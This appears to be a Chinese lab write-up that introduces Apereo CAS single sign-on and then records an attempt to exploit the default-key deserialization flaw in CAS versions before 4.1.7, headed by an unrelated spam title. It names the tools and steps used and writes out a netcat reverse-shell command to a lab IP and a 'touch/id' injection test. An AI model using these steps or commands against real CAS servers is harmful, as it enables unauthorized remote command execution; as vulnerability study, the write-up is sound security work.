成都培训学校网站建设去年做哪些网站能致富
目录
Apereo CAS是什么?
Apereo CAS4.1反序列化命令执行漏洞
Apereo CAS是什么?
Apereo CAS(Central Authentication Service)是一个开源的单点登录(SSO)解决方案,用于统一管理用户身份认证。它为web应用程序提供了集中式认证服务,使用户在多个应用系统只需登录一次,从而避免多次输入用户名和密码。
主要功能:
- 单点登录(SSO):允许用户通过一次身份验证访问多个应用程序和服务,减少密码管理负担。
- 支持多种认证协议:包括 CAS 协议、SAML、OAuth、OpenID 等,适应不同的认证需求。
- 灵活的集成:可以与各种应用程序和服务(如 Web 应用、桌面应用和移动应用)进行集成。
- 高安全性:支持多种认证方式(如双因素认证、LDAP 集成、OAuth2 等),并提供安全的令牌交换机制。
- 扩展性:Apereo CAS 提供了丰富的插件和扩展功能,可以根据组织需求进行定制。
应用场景:
- 企业内部应用:为企业的多个内部应用提供统一的身份认证服务,简化用户管理。
- 教育机构:为学校或大学的教学管理系统、图书馆系统等提供单点登录解决方案。
- 政府与大规模系统:为政府部门或大型机构的多种应用提供安全的身份认证。
优势:
- 简化用户体验:减少了登录过程中的繁琐步骤,提高用户体验。
- 提高安全性:通过集中式管理认证,降低安全漏洞的风险,特别是在使用多因素认证时。
- 支持广泛的协议:适应不同的应用环境和技术栈,使得系统集成更加灵活
Apereo CAS4.1反序列化命令执行漏洞
漏洞成因:存在默认密钥,通过默认密钥构造payload,触发反序列化漏洞。
版本要求:Apereo CAS < 4.1.7
账号要求:无
步骤1:抓取登录数据包
步骤2:利用ysoserial生成payload,这里发现生成的仅仅是普通的反序列化流,没有特定的CAS结构,成功不了。还是得用Apereo-CAS-Attack。
步骤3:替换execution参数为payload
验证结果
步骤4: 更换反向shell,测试
失败,硬编码可能不行,base64编码后测试
失败,编码后不行,难道是权限不够?测试如下
失败,没有成功生成该文件,为什么?
继续测试
确定命令正确
查看结果
命令是 touch /tmp/test;id >> /tmp/test。
结果是生成了test文件,'test;id'文件,这条命令显然是没有把“分号”当做分隔符,而是当做了文件名的一部分。
看了其他文章,发现命令写错了,正常的是:
再测试:
不行,监听没有反应,反弹不回来,但是测试payload是正确的,结果如下:
换一个payload,用"nc -e /bin/bash 192.168.23.133 9999"测试
依然是没有反应,问题可能需要一点时间分析底层原理。后续找到在修改。